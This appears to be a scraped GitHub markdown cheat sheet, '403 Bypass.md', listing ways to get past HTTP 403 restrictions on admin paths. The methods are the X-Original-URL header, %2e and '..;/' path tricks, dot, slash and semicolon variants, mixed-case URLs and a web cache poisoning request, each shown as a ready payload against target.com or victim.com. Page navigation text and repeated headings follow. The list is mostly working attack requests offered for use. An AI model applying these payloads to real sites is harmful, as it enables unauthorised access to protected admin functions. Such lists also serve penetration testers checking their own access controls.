Bypass 403 (Forbidden)

Using `X-Original-URL` header

# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com

# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

Appending `%2e` after the first slash

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/%2e/admin

Try add dot `.` slash `/` and semicolon `;` in the URL

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret

Add `..;/` after the directory name

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/admin..;/

Try to uppercase the alphabet in the url

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/aDmIN

Via Web Cache Poisoning

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

403 Bypass.md

403 Bypass.md

Bypass 403 (Forbidden)

Using `X-Original-URL` header

Appending `%2e` after the first slash

Try add dot `.` slash `/` and semicolon `;` in the URL

Add `..;/` after the directory name

Try to uppercase the alphabet in the url

Via Web Cache Poisoning

Files

403 Bypass.md

Latest commit

History

403 Bypass.md

File metadata and controls

Bypass 403 (Forbidden)

Using X-Original-URL header

Appending %2e after the first slash

Try add dot . slash / and semicolon ; in the URL

Add ..;/ after the directory name

Try to uppercase the alphabet in the url

Via Web Cache Poisoning

Using `X-Original-URL` header

Appending `%2e` after the first slash

Try add dot `.` slash `/` and semicolon `;` in the URL

Add `..;/` after the directory name